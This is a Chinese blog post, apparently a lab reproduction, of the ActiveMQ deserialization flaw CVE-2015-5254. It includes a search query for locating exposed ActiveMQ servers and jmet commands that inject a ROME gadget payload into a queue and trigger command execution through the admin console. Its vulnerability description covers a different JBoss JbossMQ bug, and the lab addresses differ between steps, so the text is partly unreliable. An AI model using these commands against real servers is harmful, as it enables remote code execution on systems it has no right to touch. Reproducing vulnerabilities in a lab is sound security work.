【漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)

Nx01 产品简介

        Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。

Nx02 漏洞描述

        Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

Nx03 产品主页

hunter-query: web.title="Apache ActiveMQ"

Nx04 漏洞复现

1.vulhub启动靶场。

2.kali中执行以下命令。

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/1" -Yp ROME 192.168.239.129 61616

3.此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过下面的URL看到这个队列中所有消息http://192.168.13.132:8161/admin/browse.jsp?JMSDestination=event

4.点击此条队列详细进行触发。

5.查看容器sudo docker-compose exec activemq bash,/tmp/1已成功创建成功。

Nx05 修复建议

Apache升级activemq5.13.0。

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-10 05:58:03       75 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-10 05:58:03       80 阅读
  3. 在Django里面运行非项目文件

    2024-01-10 05:58:03       64 阅读
  4. Python语言-面向对象

    2024-01-10 05:58:03       75 阅读

热门阅读

  1. WPF入门到跪下 第八章 动画-基础

    2024-01-10 05:58:03       40 阅读
  2. R语言学习入门(一)

    2024-01-10 05:58:03       45 阅读
  3. 实验8 分析HTTP协议和DNS

    2024-01-10 05:58:03       54 阅读
  4. 【Python】Excel不同sheet另存为不同CSV

    2024-01-10 05:58:03       52 阅读
  5. Golang switch 语句

    2024-01-10 05:58:03       57 阅读
  6. 线程与进程学习笔记

    2024-01-10 05:58:03       38 阅读
  7. Spring MVC参数的接收方式!!!

    2024-01-10 05:58:03       49 阅读
  8. 师傅带练|大数据人工智能在线实习项目特色

    2024-01-10 05:58:03       55 阅读
  9. c++ std::move()到底干了什么

    2024-01-10 05:58:03       51 阅读
  10. C# 前端GET或POST传递的两种参数body和query的区别

    2024-01-10 05:58:03       60 阅读